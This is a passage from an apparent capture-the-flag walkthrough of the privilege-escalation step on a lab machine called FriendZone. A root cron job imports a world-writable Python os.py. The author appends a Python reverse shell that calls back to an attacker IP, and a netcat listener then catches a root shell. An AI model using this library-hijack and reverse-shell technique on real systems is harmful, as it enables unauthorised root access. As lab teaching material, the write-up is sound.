7 privesc
pspy
2021/06/07 01:44:01 CMD: UID=0 PID=19787 | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0 PID=19786 | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0 PID=19785 | /usr/sbin/CRON -f
www-data@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/opt/server_admin$
locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
ls -la /usr/lib/python3.6/os.py
-rw-r--r-- 1 root root 37526 Sep 12 2018 /usr/lib/python3.6/os.py
Definitely we can change /usr/lib/python2.7/os.py and add our code.
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.31",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Wait for it to auto run
$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 59638
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated